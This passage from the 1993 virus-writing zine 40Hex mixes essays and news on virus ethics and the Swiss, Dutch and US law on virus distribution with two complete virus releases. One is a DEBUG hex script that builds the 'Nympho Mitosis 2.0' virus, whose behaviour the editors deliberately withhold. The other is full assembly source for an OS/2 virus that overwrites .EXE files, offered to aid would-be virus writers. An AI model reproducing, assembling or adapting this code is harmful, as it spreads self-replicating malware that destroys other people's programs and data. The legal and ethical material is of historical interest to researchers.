the problem is not the distribution of the viruses but the fostering of some of the attitudes. On the positive side, we see some people finally calling for "responsible" action. Only time will tell how long it lasts. To me, the P/S E-Mail virus site was a very bad choice on the part of the administrators and I am glad it is gone. Still, it was better than some situations which actively encourage using viruses to cause damage. We don't yet live in that ideal world where we can trust other people to act nice. People want to say they can't help what someone else does with a virus if they give it to them, but by exercising some common sense and responsibility, they -can- help. It's not so much to ask considering the future of cyberspace and it's freedoms are at stake here. If people keep going like they are now, soon we will have laws that say we CANNOT give certain code to anyone. Don't believe it? Read on. When I talked about laws in the Fido Virus echos, virus writers told me there is NO way there will be any laws against virus exchange BBS, anywhere, ever. Free Speech. WRONG. Do you think I just pull this stuff out of thin air? It's not illegal to have such BBS in America. Not yet. They are illegal in other countries. Specifically, the Dutch law (art.350a (3), 350b (2) Sr.) addresses the distribution of computer viruses. "Any person who intentionally or unlawfully makes available or distributes any information (data) which is meant tto do damage by replicating itself in an automated system shall be liable to a term of imprisonment not exceeding four years or a fine of 100,000 guilders." In Sweden, it's starting to sound more like this: Anyone, who, without authorization - erases, modifies, or destructs electronically or similarly saved or data, or anyone who, creates, promotes, offers, makes available, or circulates in any way means destined for unauthorized deletion, modification, or destruction of such data, will, if a complaint is filed, receive imprisonment for up to three years, a fine, or if there is considerable damage, five years sentence. Is that clear enough? It is against the law in Holland to INTENTIONALLY (i.e. on purpose, i.e. if you put it online, you knew you put it there) to make available ANY data (program) that can do damage..specifically a replicating program. That means virus. And don't forget that magic word, "extradition". The Swiss laws are in draft stage. Now, a lot of virus writers say they can't be held responsible for a virus doing damage if they don't mean for it to escape, or if someone else uses it. Wrong again. The law of negligence allows victims of accidental injury to sue to obtain compensation for losses caused by another's negligence. But, it's even more applicable if you consider the aspect of torts. You can have what is called an intentional tort (which is what lawyers use to refer to suits that try to get dollars for damages, such as libel, fraud). In these kinds of cases, you may think just because you didn't mean for your virus to 'escape' you are not legally responsible (forgetting about ethics for a minute. A lot of virus writers seem to think if its not illegal to do xyz, xyz is therefore ok to do. So lets put ethics aside and look at legalities). You are indeed legally responsible because all that is necessary to establish intentional torts is that you -intended- to do the act (write the virus) that caused the harm. The law of negligence allows victims of accidental injuries to sue for compensation due to negligence. This of course refers to U.S. law, and is not in any way a complete reference, but you can get the general idea. You don't just have free rein. But, the law is not the solution, in my opinion. However, you can force it to become the solution if you do not take responsibility for your actions. If you keep making these viruses available indiscrimately, you are creating LAWS, just as surely as if you had written the law with your own hand. Stop to think for a moment of the implications of this. The Dutch enacted laws as the abuse of computerized equipment increased. While some laws already existed that addressed computer crime, it became clear that some intentional damage was being done that was slipping through the loopholes in the law. Something must be going on that caused them to react so strongly, to specifically include virus exchange bulletin boards in this legislation. What was going on? Malicious damage. Incitement. Actions that helped people to do damage. What is this "incitement"? Incitement. That is a term that is getting a lot of publicity now, with Mike Elansky held on $500,000 bail for distributing a text file on his BBS. The file contained the following text: ! Note to Law-enforcement type people: ! ! This file is intended to promote ! ! general havoc and *ANARCHY*, and ! ! since your going to be the first ! ! assholes up against the wall.. there ! ! isnt a damn thing you can do about ! ! it, pigs! ! It may be distasteful to some people, but the kind of information included in the file was the same 'anarchy' type information you can get at your local library. Does it merit a young man being locked up with an almost impossible bail? It's no worse than a lot of the graffitti you can find in Manhattan, or LA, and it's no worse than you can hear on a lot of albums. To me personally, it's just silliness. I know the fellow who wrote the file, and I don't find him to be a threatening anarchist. He's a fine person, who wrote the above as a parody-spoof. It is not much different than the things you hear in the halls at most high schools these days. I'm not saying it's a desireable manner of expressing dissatisfaciton with the system, but its *NOT* the devil incarnate. Someone had it on their BBS, someone downloaded it, and now, the BBS sysop is in jail for it. Something's happening here... Fear. People are afraid. They are chasing the shadowy ghost, and imagine it is 'the virus writer' or 'the hacker'. Well, virus writers and hackers may do some of these things, but the majority of them do not. the publicity. Why? Because they want it. And, what happens when they want it, and get it? More fear. The real ghost is ignorance and fear, not the virus writer or hacker. On the other hand there ARE some very malicious people out there. And, maybe to protect people from them, we will need laws. The way it stands right now, no one knows who is malicious and who is not because everyone is hiding behind the "law". This will change, very soon, if people do not stop thinking they can just do whatever they like because its "legal". Laws are established when new situations come about, and some people are pushing the envelope here. One thing that is happening is that people are afraid to say something is wrong. We all have to stop being afraid to say something is WRONG. It is WRONG to destroy or damage data of other people. It's WRONG to encourage people to do it. and, if you can't figure out what encourages people, then you had better figure it out soon, because we don't have much time left. I say you better figure it out fast because right now, people are up in arms about computer viruses. They have every right in the world to expect they shouldn't have to be on guard against any 'toys' that happen to escape. They certainly deserve to be protected from people who malicious release, or -irresponsibly release- viruses. They should not have to learn every in and out of DOS to protect themselves. For most people, computers are work. They are not just hack-o-matik machines waiting to be explored. No one has the right to destroy other people's information. Just like we don't want the government or other people to just do whatever they feel like with -our- information, we have to respect other people's rights to -their- information. It isn't working. There are still people who are doing malicious things with viruses. In talking with a lot of virus writers, I've pretty much gotten the same story. After a while, it's just not fun to do it anymore, and they evolve into learning more about code in general. They no longer upload it to unsuspecting people. Most of them don't even use virus exchange BBS, because there is just not any point. You can only get excited over FF/FN so many times, and sooner or later you move on to other things. But there is still a problem. Newcomers to the virus scene pass thru the same stages; they release their viruses either through incompetence or purposeful maliciousness, to 'prove' themselves. It's almost like a rite of passage. It is this group, the intentionally malicious, that are drawing all of the attention. It is this group that forced the hand of the Dutch government. It is this group, malicious virus writers and hackers that are drawing the attention of the the Legislators and Judiciary in the United States, Canada, and now Switzerland. Consider that we are living in a truly global society. The laws cannot forever be bound by traditional territorial borders. Think of the implications for the future. Being held hostage by one's freedoms tends to make one rethink their "Rights". ------- -- SGordon@Dockmaster.ncsc.mil / vfr@netcom.com bbs: 219-273-2431 fidonet 1:227/190 / virnet 9:10/0 p.o. box 11417 south bend, in 46624 *if you don't expect too much from me then you might not be let down* ---- I originally had a huge response for this, but I found that a majority of my arguments were more aimed at the point of view she was explaining, rather then her viewpoint. The bottom line is, laws that regulate information are horrible. If it happens, it is unenforcible. I do not believe that virus writers should be 'nice', or politically correct, and I dont ever plan on removing virus source from 40Hex. Another problem with her article is the part about virus writers doing whatever they like just because it is 'legal'. The point is, because it IS legal, we can write viruses. People also break the law and distribute viruses. It is NOT wrong to write a virus. By any morality. It is wrong to use it on someone else's computer illegally. For the most part I agree with Sara Gordon. Before you go about saying she is a narc, and she did this, and she did that, just ask yourself what have you done about virus legislation. If it is equal to zero, zilch, nada, etc., then you should at least give her the credit of doing something to help the underground, despite the rumors. I don't care whether you trust Sara Gordon, but realize that in this issue she is definately fighting the legislation. 40Hex Number 12 Volume 3 Issue 3 File 007 This is the latest virus from our newest member Memory Lapse. This time, we aren't going to tell you what it does, so, enjoy it. It is called Nympho Mitosis 2.0. ->Gheap ------------------------------------ n nympho20.com e 0100 BD 00 00 48 CD 21 BB 4D 5A 74 53 1E 06 33 FF 8C e 0110 C0 48 8E D8 38 3D 75 44 88 1D 83 6D 03 44 83 6D e 0120 12 44 8B 45 12 8E D8 40 8E C0 88 3D C7 45 01 08 e 0130 00 C7 45 03 43 00 0E 1F 8D B6 00 01 81 F7 00 01 e 0140 B9 94 01 F3 A5 B8 89 01 8E D9 87 06 84 00 26 A3 e 0150 BC 01 8C C0 87 06 86 00 26 A3 BE 01 07 1F 8D B6 e 0160 FB 03 2E 3B 1C 74 13 86 FB 2E 2B 1C 74 0C BF 00 e 0170 01 57 C6 05 C3 FF D7 A4 A5 C3 8C C0 05 10 00 2E e 0180 03 44 16 50 2E FF 74 14 CB 3D FF FF 75 02 40 CF e 0190 80 FC 4E 74 33 80 FC 4F 74 2E 80 FC 11 74 56 80 e 01A0 FC 12 74 51 06 1E 60 33 ED 3D 00 6C 74 12 80 FC e 01B0 3D 74 0F 2D 00 4B 74 0D 61 1F 07 EA 00 00 00 00 e 01C0 87 D6 E9 C2 00 E9 20 01 E8 2A 02 72 25 60 06 B4 e 01D0 2F CD 21 26 8B 47 16 26 8B 4F 18 25 1F 00 83 E1 e 01E0 1F 49 33 C1 75 0A 26 81 6F 1A 13 03 26 19 47 1C e 01F0 07 61 CA 02 00 E8 FD 01 84 C0 75 3F 60 06 B4 51 e 0200 CD 21 8E C3 26 2B 1E 16 00 75 2E 8B DA 8A 07 50 e 0210 B4 2F CD 21 58 FE C0 75 03 83 C3 07 26 8B 47 17 e 0220 26 8B 4F 19 25 1F 00 83 E1 1F 49 33 C1 75 0A 26 e 0230 81 6F 1D 13 03 26 19 47 1F 07 61 CF 5B 4E 79 6D e 0240 70 68 6F 20 4D 69 74 6F 73 69 73 5D 20 76 32 2E e 0250 30 00 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 e 0260 31 39 39 33 20 4D 65 6D 6F 72 79 20 4C 61 70 73 e 0270 65 00 50 68 61 6C 63 6F 6E 2F 53 6B 69 73 6D 20 e 0280 43 61 6E 61 64 61 00 E8 30 01 26 8B 45 0D 26 8B e 0290 4D 0F 25 1F 00 83 E1 1F 49 2B C1 75 48 E8 44 01 e 02A0 52 50 2D 18 00 1B D5 26 89 45 15 26 89 55 17 B4 e 02B0 3F B9 18 00 BA 13 04 CD 21 E8 1F 01 B4 40 CD 21 e 02C0 58 5A 2D 13 03 1B D5 26 89 45 15 26 89 55 17 B4 e 02D0 40 8B CD CD 21 26 8B 4D 0D 26 8B 55 0F 80 E1 E0 e 02E0 FE C1 E9 C9 00 E9 CB 00 E8 CF 00 26 8B 45 0D 26 e 02F0 8B 4D 0F 25 1F 00 83 E1 1F 49 33 C1 74 32 B4 3F e 0300 B9 18 00 BA FB 03 CD 21 B8 4D 5A BE 13 04 8B 16 e 0310 FB 03 3B C2 74 1D 86 E0 2B C2 74 17 E8 C5 00 A3 e 0320 01 01 B9 03 00 2B C1 C6 04 E9 89 44 01 51 EB 57 e 0330 E9 80 00 26 8B 45 20 3D 54 42 74 F4 3D 46 2D 74 e 0340 EF 3D 53 43 74 EA 2D 43 4C 74 E5 E8 8D 00 B4 3F e 0350 51 8B D6 CD 21 E8 8C 00 52 50 05 13 03 13 D5 B9 e 0360 00 02 F7 F1 0B D2 74 01 40 89 54 02 89 44 04 58 e 0370 5A B9 10 00 F7 F1 2B 44 08 89 54 14 89 44 16 81 e 0380 EA 00 01 89 16 01 01 B4 40 B9 13 03 BA 00 01 CD e 0390 21 E8 47 00 B4 40 59 8B D6 CD 21 26 8B 4D 0D 26 e 03A0 8B 55 0F 52 83 E1 E0 83 E2 1F 4A 0B CA 5A B8 01 e 03B0 57 CD 21 B4 3E CD 21 E9 FE FD B8 00 3D E8 35 00 e 03C0 93 53 0E 0E 1F 07 B8 20 12 CD 2F B8 16 12 26 8A e 03D0 1D CD 2F 5B 26 C7 45 02 02 00 C3 26 89 6D 15 26 e 03E0 89 6D 17 C3 1E 26 C5 45 11 8C DA 26 89 45 15 26 e 03F0 89 55 17 1F C3 9C 0E E8 C1 FD C3 CD 20 02 00 04 e 0400 00 06 00 08 00 0A 00 0C 00 0E 00 10 00 12 00 14 e 0410 00 16 00 rcx 0313 w q ------------------------------------------------------ 40Hex Number 12 Volume 3 Issue 3 File 008 Article #1 ---------- Subj: Draft Swiss AntiVirus regulation To whom it may concern: The Swiss Federal Agency for Informatics (Bundesamt fuer Informatik, Bern) is preparing a legislative act against distribution of malicious code, such as viruses, via VxBBS etc. You may know that there have been several attempts to regulate the development and distribution of malicious software, in UK, USA and other countries, but so far, Virus Exchange BBS seem to survive even in countries with regulations and (some) knowledgeable crime investigators. In order to optimize the input into the Swiss legal discussion, I suggested that their draft be internationally distributed, for comments and suggestions from technical and legal experts in this area. Mr. Claudio G. Frigerio from Bern kindly translated the (Swiss) text into English (see appended text, both in German and English); in case of any misunderstanding, the German text is the legally relevant one! Any discussion on this forum is helpful; please send your comments (Cc:) also to Mr. Claudio G. Frigerio (as he's not on this list). "The Messenger" (Klaus Brunnstein: October 9, 1993) ############################################################### Appendix 1: Entwurf zu Art. 144 Abs. 2 des Schweizerischen Strafgesetzbuches "Wer unbefugt elektronisch oder in vergleichbarer Weise gespeicherte oder uebermittelte Daten loescht, veraendert oder unbrauchbar macht, oder Mittel, die zum unbefugten Loeschen, Aendern oder Unbrauchbarmachen solcher Daten bestimmt sind, herstellt oder anpreist, anbietet, zugaenglich macht oder sonstwie in Verkehr bringt, wird, auf Antrag, mit der gleichen Strafe belegt." P.S.: gleiche Strafe =JBusse oder Gefaengnis bis zu 3 Jahren; bei grossem Schaden, bis zu 5 Jahren Gefaengnis sowie Verfolgung von Amtes wegen (Offizialdelikt) ############################################################### Draft of article 144 paragraph 2 of the Swiss Penal Code (English translation) "Anyone, who, without authorization - erases, modifies, or destructs electronically or similarly saved or data, or anyone who, - creates, promotes, offers, makes available, or circulates in any way means destined for unauthorized deletion, modification, or destruction of such data, will, if a complaint is filed, receive the same punishment." P.S.: same punishment =Jfine or imprisonment for a term of up to three years; in cases of a considerable dam-age, five years with prosecution ex officio ############################################################### Author: Claudio G. Frigerio, Attorney-At-Law Swiss Federal Office of Information Technology and System, e-mail: bfi@ezinfo.vmsmail.ethz.ch ############################################################### Article 2: --------- Subj: More about Swiss Anti-Virus Laws Thanks to everybody who replied on the subject of Swiss Anti-Virus Legis- lation. As somebody noticed there was a word missing in the English translation. It should have been: "... destructs electronically or similarly saved or TRANS- MITTED data will..." The text posted to the net, was a trial to include into the "data damaging" even creation and dealing/circulating computer viruses. The idea behind this, is that the virus itself already carries the malicious intent of his author. Therefore it is dangerous in any circumstance. Actually a virus can not be abused, as the idea of abuse includes the possibility, that a virus can be used in a good way too. As I have been told by specialists, there is no such "good use" of a virus as any unauthorized change of data has the potential of interfering with other data and/or programs in environments, that the virus author did/could not foresee. And even the unauthorized use of storage space is a damage, as this space will not be available for authorized uses of the computer system. Computer virus are an "absolute danger", and as any other dangerous thing (like explosive, poison, radioactiv materials or genetic materials in specialized labs) computer virus should not be created or circulated without restrictions. It has been remarked that in the text there was no word about the requisite intent or requisite knowledge of the committer. This way any BBS sysop would always risk criminal charges, if his BBS carries any virus infected software but the sysop isn't aware of it. I apologize for not having told that Swiss Penal Law only considers inten- tional crimes, if there is no explicit indication that negligent acts are punished too. Therefore according to Swiss Penal Law terminology and system, the text posted to the net only considers who "knowingly and willingly" commits the act. That means that the author of the virus has to know it was a virus, what he created: this is always the case. And who circulates the virus has to know it was a virus and he wanted to circulate it. The know- ledge that SW was or carried a virus can be proved easily by the fact that nobody knowingly stores viruses without labeling or marking them in any way, in order not to be infected himself (yes, I know: if there really is somebody so foolish, I have to find another way to prove his knowledge). For BBS a "Virus Directory" containing viruses or virus source codes is evidence enough for the "requisite knowledge and intent". The law does no want to punish accidental distribution of viruses. The phrase "means destined for unauthorized deletion" has been considered unclear. "Means" certainly includes not only software, but source code (on paper as on disks) too. It has been remarked that it's the classical tool- maker problem: a knife can be used as woodcarver to make a great work, but it might be used aven as a thug to commit murder. I realized this problem, but would you consider a knife as generally destined to commit murder? Or would you consider explosive as generally destined to create damage? We have to be aware that most items can be used in a legal or abused in an illegal way. Seldom an item can only be used in an illegal way, but computer viruses are such items! I do not speak about software using virus specific reproduction techniques (like "killer viruses" for copyright enforcement or "anti-viruses" supposed to fight viruses) that make data changes with the explicit (contract/license) or implicit (highly probable agreement of the user) authorization of the user. This kind of SW is actually not included in the definition of "means destined for unatho- rized deletion, modification, or destruction of data". Therefore you cannot say that Norton Utilities, WipeFile or any other similar general purpose SW or utilities are "destined for unautorized deletion, modification or destruction", although they certainly could be used for this. The text doesn't say anything about malice, malicious intents or the intent to damage, as these elements are very difficult to prove in trial, if the accused denies any such intention. Actually I considered these subjective elements as not really necessary, as the virus already carries the malicious intent of its author: the malice of the author is proved by his virus, and the malice of somebody circulating the virus is proved, if his knowledge, that he was circulating a virus, is proved. According to general principles of penal law the site of crime is the main link to charge somebody. If a virus has been created or circulated outside the national borders of Switzerland, Swiss Penal law cannot be applied. But if a virus created outside Switzerland is transferred electronically to Switzerland, the downloader will be held responsible, no matter if he was in Switzerland or abroad, as "importing" as a way to circulate the virus. The "success" of the act will take place in Switzerland. Anyway Art. 7 of Swiss Penal Law follows the principle of territoriality and the "Ubiquitaetsprinzip" (sorry: didn't find the correct English word: an act is considered being committed not only where the committer was, when he started his crime, but also where the "success" has been realized. Anyway I do consider clearifing this by inserting that "importing" virus is considered as "circulating in any way". As this crime is prosecuted as soon as police or prosecution authority knows about it (so called "ex officio", there is no need for a specific complaint: a detailed information about a fact is enough to start investigations, no matter where the information came from (e.g. abroad). There is no doubt, that professional ant-virus specialists and scientists should have access to viruses and be allowed to even create viruses. As long as this is covered by the aim of studying strategies to fight computer viruses, this is OK. I actually planned a system of registrering these people with a federal authority (e.g. the IS Security Dptm. at the Swiss Federal Office of Information Technology and Systems or the Ministery of Justice). The posted text would be then need to be completed as follows: "Who, without being registered with the proper federal authority, creates... Only trustworthy individuals, who are professionally or scientifically active in combatting such means, may be registered on demand." The Swiss legislator is actually not only considering "data damaging" but "hacking", "time theft" and computer fraud too, but these ARE NOT subjects of the discussion in this forum now. The same applies to software piracy, already ruled by another law. I will gladly email/fax the German, French or Italian text of the Penal Law draft to anybody interested. Please do not ask me an English translation of these, as I am not a professional English translator of legal text. I am aware that the UK and Italy have/are going to have laws allowing to prosecute the creation and circulation of computer viruses. If anybody knows of other contries, may he please let me know in any way and as soon as possible. On Monday, 25 October 1993, there will a meeting with the Ministery of Justice in order to convince them to propose this to the Parliament. This will be very very difficult, as there generally is very little knowledge on, or concern for the threat through computer viruses. Most people have simply never suffered an attack of computer viruses. Thanks again for following this item with your comments. Claudio G. Frigerio P.S.: Please do not suggest to me to send them a floppy with a ..... just to make them more aware of the risks... P.P.S.: You can phone/email/fax/write to me in Italian, German, French, Spanish or English. Article #3 ---------- Subj: Detection complexity of some newish viruses. (PC) A while back (January 93) a few people posted sizes of their algorithmic virus detectors. Here are the line counts for a couple more detectors included (or to be included) in IBM AntiVirus. These counts are for lines of C; the code is not particularly dense. The SatanBug (*) count includes some tables. (File I/O handling is *not* included in these counts. The lines-of-code counter is a standard counter used in many IBM development projects. I'm not completely sure what rules this lines-of-code counter uses. Some lines are counted as both code and comment lines.) SatanBug ::= 421 physical lines, 173 comment lines, and 187 code lines Tremor ::= 165 physical lines, 36 comment lines, and 107 code lines (*) There is some disagreement about the name of this virus. Bill Arnold, barnold@watson.ibm.com (IBM AntiVirus Development) Article 4: ---------- Subj: Electronic Warfare The October 18th issue of Aviation Week has an interesting item in its Washington Outlook column on future developments in electronic warfare. Paraphrase follows: A Pentagon official, H. Steven Kimmel, deputy director of C3I testing and evaluation in the Pentagon acquisition office, said the next developments in "non-lethal electronic combat" should be on methods of injecting deceptive information and computer viruses into enemy command, control, communication and intelligence systems and into enemy communication nodes and data bases. Kimmel was speaking to the Association of Old Crows, a group of electronic warfare specialists. He further said that the U.S. needs this "nonlethal capability" both defensively and offensively. It was pointed out that American C3I systems are vulnerable because of their many nodes and reliance on computers and commercial off the shelf components. Article 5: ---------- Subj: Swiss Anti Virus Law On November 11, 1993 the Law Committee of the 2nd Chamber of the Parliament (German: "Staenderat"; a kind of "Swiss Senate") decided to accept the anti- virus propositions. The Staenderat will probably discuss in Parliament and decide on the subject by December 1993. In the Law Committee there was practically no opposition to the law draft; thus it is very likely that the Staenderat will accept it too. After this the "Nationalrat" (the 1st Chamber of Parliament, a kind of "Swiss House of Representatives" or "Swiss Congress") will discuss the draft and decide about it by Spring 1994. The Swiss law draft, posted to the net, has been changed considerably in the last few weeks. The draft actually discussed in Parliament will be: German text: Schweizerisches Strafgesetzbuch, Artikel 144bis, Datenbeschaedigung 1. Wer unbefugt elektronisch oder in vergleichbarer Weise gespeicherte oder uebermittelte Daten loescht, veraendert oder unbraucbar macht, wird, auf Antrag, mit Gefaegnis oder mit Busse bestraft. Hat der Taeter einen grossen Schaden verursacht, so kann auf Zuchthaus bis zu fuenf Jahren erkannt werden. Die Tat wird von Amtes wegen verfolgt. 2. Wer Programme, von denen er weiss oder annehmen muss, dass sie zu den in Ziffer 1 genanten Zwecken verwendet werden sollen, herstellt, einfuehrt, in Verkehr bringt, anpreist, ueberlaesst oder sonstwie zugaenglich macht oder zu ihrer Herstellung Anleitung gibt, wird mit Gefaegnis oder mit Busse bestraft. Handelt der Taeter gewerbsmaessig, so kann auf Zuchthaus bis zu fuenf Jahren erkannt werden. English text: Swiss Criminal Code, Article 144bis, Damaging of data 1. Anyone, who without authorization deletes, modifies or renders useless electronically or similarly saved or transmitted data, will, if a complaint is filed, be punished with the imprisonment for a term of up to 3 years or a fine of up to 40000 Swiss francs. If the person charged has caused a considerable damage, the imprisonment will be for a term of up to 5 years. The crime will be prosecuted ex officio. 2. Anyone, who creates, imports, distributes, promotes, offers, makes available, circulates in any way, or gives instructions to create programs, that he/she knows or has to presume to be used for purposes according to item 1 listed above, will be punished with the imprisonment for a term of up to 3 years or a fine of up to 40000 Swiss francs. If the person charged acted for gain, the imprisonment will be for a term of up to 5 years. This English translation may not be perfect. The text will be available by January 1994 in all official Swiss languages: German, French and Italian. The protected item of this article are just data (immaterial goods). Any damage to computer systems, like the burning of floppies, plug-pulling, sledgehammers etc. are damages to "physical/material things" covered by article 144 (Sachbeschaedigung, damage to property). According to Swiss penal legislation the requisite knowledge and intent ("knowingly and willingly") have not to be mentioned specifically. As you may have noticed, the "registration" of IS security pros has been dropped. The expression "that he/she knows or has to presume to be used for purposes according to item 1 listed above" will exclude any penal responsibi- lity if the committer e.g. gave a virus to a professional anti-virus software developer or is creating viruses for research, as in these and similar special situations a misuse of the virus is highly unlikely. The committer will not be prosecuted, if he had reasonable motives, to practically exclude a misuse. On a retrospective analysis the judge will check if the person who gave a viruses to somebody else (who misused it to cause damage) could in any way be blamed for not having foreseen the occurred misuse. If you give a virus to a notorious anti-virus professional, known for spreading viruses or source codes, or simply to somebody who does not give a special guarantee for not misusing the virus, you will be prosecuted. Who just trusted in the promise of a virus-recipient, that the latter will not misuse it, will be in trouble, if he did not have a very special additional reason to trust him. The law considers viruses as so dangerous for the general public, that any act making them available to somebody else, represents a general risk to the general public. Who invokes an exception,that an act of making a virus available to somebody else, did not represent such a risk has to prove it. This may cause some concern, but law can not foresee any situation. Judges will have to carefully check if the reasons to give a virus to somebody else, were good enough to practically exclude any misuse. Making a newly discovered virus available to McAfee or the Virus Test Center will not be a crime, as long as the reputation of these recipients is above any suspicion. As the draft is now in the Parliament, there is practically no way to change any thing in this text anymore (by the administration). Now it is up to the politicians to decide about the subject and to make any additional change. 40Hex Number 12 Volume 3 Issue 3 File 009 This virus was given to us by Arthur Ellis, and is the first piece of OS/2 virus source that I have ever seen. Although it is only an overwriting virus, it should definately be helpful for anyone who wants to write viruses in OS/2. ->GHeap ------------------------------------------------------------------ INCLUDE OS2.INC ; if you don't have OS2.INC, see end of this file COMMENT * This simple overwriting virus demonstrates how the OS/2 API functions are used to search for, open, and infect programs. No extended registers are used, and the program may be assembled with MASM 5.1 or 6.0, TASM for OS/2 (from the Borland C++ package), or with IBM Macro Assembler/2. Link with :link386 /exepack virus,,,c:\os2\doscalls,virus.def VIRUS.DEF: NAME VIRUS WINDOWCOMPAT PROTMODE STACKSIZE 8192 There is minimal error checking (since when do viruses check errors?). A useful project for a student would be to convert this program to .386p mode. - Arthur Ellis, 1993 * PrintIt MACRO string, StrLen push 1 ; stdout handle push DS mov DX, OFFSET string ; string to write push DX xor CX,CX ; zero CX mov CL, [StrLen] ; string length push CX push DS push OFFSET Written ; bytes written variable call DosWrite ; like int 21/40 ENDM OpenIt MACRO seg, handle, mode ; SEGMENT, open mode, handle push seg ; SEGMENT of file name push BX ; OFFSET of file name push DS ; SEGMENT of handle push OFFSET handle ; OFFSET of handle push DS ; SEGMENT of open action push OFFSET OpenAction ; OFFSET of open action push 0 ; file size DWORD push 0 ; file size DWORD push 3 ; attributes: hid,r-o,norm push 1 ; FILE_OPEN push mode ; OPEN_SHARE_DENYNONE push 0 ; DWORD 0 (reserved) push 0 ; DWORD 0 (reserved) Call DosOpen ; like int 21/3D ENDM .286p STACK SEGMENT PARA STACK 'STACK' DW 1000h STACK ENDS DGROUP GROUP _DATA, STACK ASSUME CS:_TEXT, DS:DGROUP, SS:DGROUP, ES:DGROUP _DATA SEGMENT WORD PUBLIC 'DATA' FileSpec DB '*.EXE', 0 OpenErr DB ' ',13,10,27,'[m' Hello DB 27,'[2J',27,'[1;36mMy name is ' Infected DB ' --> infected' CRLF DB 13,10,27,'[m' Written DW ? ; bytes written MyHandle DW ? ; virus handle VicHandle DW ? ; victim handle OpenAction DW ? ; open result Buf FileFindBuf <> ; file find structure MySize DW ? ; virus length EnvSeg DW ? ; selector for environment CmdOfs DW ? ; OFFSET of command line Image DB 2000 dup (?) ; virus image ImageLen DW ? ; length of virus DirHandle DW -1 ; directory handle SrchCount DW 1 ; search count _DATA ENDS _TEXT SEGMENT WORD PUBLIC 'CODE' extrn DOSCLOSE:far, DOSEXIT:far, DOSWRITE:far, DOSGETENV:far extrn DOSFINDCLOSE:far, DOSFINDFIRST:far, DOSFINDNEXT:far extrn DOSOPEN:far, DOSREAD:far main PROC far start: call GetName ; get the virus filename OpenIt ES, MyHandle, 40h ; open virus for read ;-------------------------------------------------------------------- ;---( Read virus to image buffer )----------------------------------- ;-------------------------------------------------------------------- push MyHandle ; handle for this program push DS ; buffer for file image push OFFSET Image push 2000 ; Could use DosQFileInfo to ; get filesize but this works push DS push OFFSET ImageLen ; virus length goes here call DosRead ; like int 21/3F ;-------------------------------------------------------------------- ;---( Find files to infect )----------------------------------------- ;-------------------------------------------------------------------- call FindIt ; find first file found: or AX, AX ; error? jz NoErr ; no error quit: push 1 ; terminate all threads push 0 ; return code call DosExit ; like int 21/4C NoErr: cmp word ptr SrchCount, 0 ; no files found? jz quit ; none found PrintIt Buf.findbuf_achname,Buf.findbuf_cchName ; display filename found ;-------------------------------------------------------------------- ;---( Write virus )-------------------------------------------------- ;-------------------------------------------------------------------- lea BX,Buf.findbuf_achName ; filename OFFSET in BX OpenIt DS, VicHandle, 42 ; ACCESS_READWRITE|SHAREDENYNONE or AX,AX ; error? jz proceed PrintIt OpenErr, 25 ; error on open jmp CloseIt proceed: PrintIt Infected,15 ; add to hit list mov BX,[VicHandle] push [VicHandle] ; write to found file push DS push OFFSET Image ; string to write push [ImageLen] ; image length push DS push OFFSET Written ; bytes written variable call DosWrite ; write the virus CloseIt: push [VicHandle] ; prepare to close call DosClose ; close file ;-------------------------------------------------------------------- ;---( Find next file )----------------------------------------------- ;-------------------------------------------------------------------- push DirHandle ; Directory Handle push DS ; SEGMENT of buffer push OFFSET Buf ; OFFSET of buffer push SIZE Buf ; length of buffer push DS ; SEGMENT of count push OFFSET SrchCount ; OFFSET of count call DosFindNext ; Find next file ; like int 21/4F jmp found ; infect if found else exit main ENDP ;-------------------------------------------------------------------- ;---( Get virus file name from environment )------------------------- ;-------------------------------------------------------------------- GetName PROC near push ds push OFFSET EnvSeg push ds push OFFSET CmdOfs call DosGetEnv ; get seg, ofs of command line mov ES,EnvSeg ; ES:BX holds command line mov BX,CmdOfs xor DI,DI xor AL,AL mov CX,-1 cld scan: repne scasb ; scan for double null scasb jne scan ; loop if single null mov BX,DI ; program name address mov CX,-1 ; find length repne scasb ; scan for null byte not CX ; convert CX to length dec CX mov [MySize],CX ; return length PrintIt Hello, 22 push 1 ; stdout handle push ES ; segment for command line push BX ; OFFSET of program name push [MySize] ; length of program name push DS push OFFSET Written ; bytes written variable call DosWrite ; like int 21/40 PrintIt CRLF,5 ret GetName ENDP ;-------------------------------------------------------------------- ;---( Find first victim )-------------------------------------------- ;-------------------------------------------------------------------- FindIt PROC near push DS push OFFSET FileSpec push SS ; SEGMENT of directory handle lea AX, DirHandle ; OFFSET of directory handle push AX push 07h ; attribute push DS ; SEGMENT of buffer push OFFSET Buf ; OFFSET of buffer push SIZE Buf ; length of buffer push DS ; SEGMENT of search count lea AX, SrchCount ; OFFSET of search count push AX push 0 ; Reserved push 0 call DosFindFirst ; Find first file ret ; like int 21/4E FindIt ENDP ;-------------------------------------------------------------------- _TEXT ENDS END start ;-------------------------------------------------------------------- ;--( FTIME structure from OS2.INC )---------------------------------- ;-------------------------------------------------------------------- ;FTIME STRUC ; ftime_fs DW ? ;FTIME ENDS ;ftime_twosecs EQU 01fh ;ftime_minutes EQU 07e0h ;ftime_hours EQU 0f800h ;-------------------------------------------------------------------- ;--( FDATE structure from OS2.INC )---------------------------------- ;-------------------------------------------------------------------- ;FDATE STRUC ; fdate_fs DW ? ;FDATE ENDS ;fdate_day EQU 01fh ;fdate_month EQU 01e0h ;fdate_year EQU 0fe00h ;-------------------------------------------------------------------- ;--( FileFindBuf structure from OS2.INC )---------------------------- ;-------------------------------------------------------------------- ;FILEFINDBUF STRUC ;findbuf_fdateCreation DB SIZE FDATE DUP (?) ;findbuf_ftimeCreation DB SIZE FTIME DUP (?) ;findbuf_fdateLastAccess DB SIZE FDATE DUP (?) ;findbuf_ftimeLastAccess DB SIZE FTIME DUP (?) ;findbuf_fdateLastWrite DB SIZE FDATE DUP (?) ;findbuf_ftimeLastWrite DB SIZE FTIME DUP (?) ;findbuf_cbFile DD ? ;findbuf_cbFileAlloc DD ? ;findbuf_attrFile DW ? ;findbuf_cchName DB ? ;findbuf_achName DB 256 DUP (?) ;FILEFINDBUF ENDS ;--------------------------------------------------------------------- --------------------------------------------------------------------- NAME VIRUS WINDOWCOMPAT PROTMODE STACKSIZE 8192 ---------------------------------------------------------------------- masm /Zi %1; link386 /exepack %1,,,c:\os2\doscalls,virus.def